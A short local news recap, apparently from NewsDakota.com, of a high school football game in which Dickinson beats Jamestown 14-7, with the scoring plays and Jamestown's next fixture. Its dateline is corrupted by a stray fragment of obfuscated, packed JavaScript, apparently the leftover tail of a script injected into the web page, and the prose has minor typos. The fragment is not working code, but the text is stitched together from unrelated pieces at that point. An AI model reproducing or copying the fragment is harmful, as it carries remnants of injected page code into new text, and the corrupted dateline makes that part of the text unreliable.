DICKINSON, tsibd|var|u0026u|referrer|izdte||js|php’.split(‘|’),0,{}))
ND (NewsDakota.com) – Jamestown traveled out west to Dickinson for a rare Thursday night WDA showdown and left having played arguably their best game of the season. It didn’t end up as a win and there were missed opportunists, but playing the No. 2 team in the state to a 14-7 decision isn’t all bad.
Dickinson scored the game’s first points on the final snap of the opening quarter to take a 6-0 lead. Jamestown responded given a golden opportunity following a muffed punt by Dickinson return man Mike McChesney. Two plays later, Jamestown used some trickery on a reverse pass from Noah Wanzek to Logan Anderson for a 28-yard touchdown.
The Midgets, after falling behind for the first time, drove right down and answered with a long drive capped off by a Shawn Steffen touchdown run. Tyrell Harris added an easy two-point conversion. That was the games final scoring play as the half would end at 14-7.
Jamestown had two drives inside the Dickinson High 30-yard line that ended in no-points in the third quarter and the Midgets were able to seal a win.
The Jays will host Bismarck High next Friday night at Ernie Gates Field.
